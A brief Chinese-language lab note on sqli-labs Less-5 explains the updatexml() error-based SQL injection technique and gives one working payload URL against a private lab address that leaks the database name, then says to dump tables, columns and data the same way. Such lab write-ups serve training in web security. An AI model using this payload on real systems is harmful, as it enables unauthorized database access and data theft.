【靶场训练】sql-libs_less-5

1.报错注入攻击函数之updatexml(xml_target,xpath_expr,new_xml);

xml_target:需要操作的xml片段，用1填充

xpath_expr:需要更新的xml路径

new_xml：更新的内容，用1填充

具体使用：http://192.168.48.149/sql/Less-5/?id=1' and updatexml(1,concat('!',(select database()),'!'),1) -- lq

2.列出数据库

 

3 后续操作与前文一样，爆出表名 ，字段名，表中数据即可。